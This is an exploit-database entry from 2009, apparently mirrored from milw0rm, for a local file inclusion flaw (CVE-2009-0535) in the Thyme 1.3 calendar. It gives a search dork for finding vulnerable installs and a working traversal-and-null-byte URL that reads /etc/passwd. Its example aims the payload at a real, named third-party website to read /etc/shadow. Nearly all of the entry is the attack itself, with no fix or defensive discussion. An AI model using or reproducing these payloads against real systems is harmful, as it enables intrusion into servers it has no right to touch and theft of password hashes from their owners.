Thyme 1.3 - 'export_to' Local File Inclusion



EKU-ID: 15862 CVE: OSVDB-51959;CVE-2009-0535;OSVDB-51864 OSVDB-ID:
Author: cheverok Published: 2009-02-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Theme Local File Inclusion / (Register_globals: off) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Version: <= 1.3 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Dork: Thyme 1. © 2006 eXtrovert Software LLC. All rights reserved |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Founded by: cheverok[at]gmail.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

--------------------------------------------------------------------------------------
  Intro:

See info

  http://host/patch/phpinfo.php


if register_globals Off, then

---------------------------------------------------------------------------------------
  Exploit:

  http://host/patch/modules/sync/export.php?export_to=../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------------------------
  Example:


  http://www.cbpool.org/thyme/modules/sync/export.php?export_to=../../../../../../../../../../../etc/shadow%00

----------------------------------------------------------------------------------------
(c) cheverok, 10.2.2009 greetz to antichat

# milw0rm.com [2009-02-10]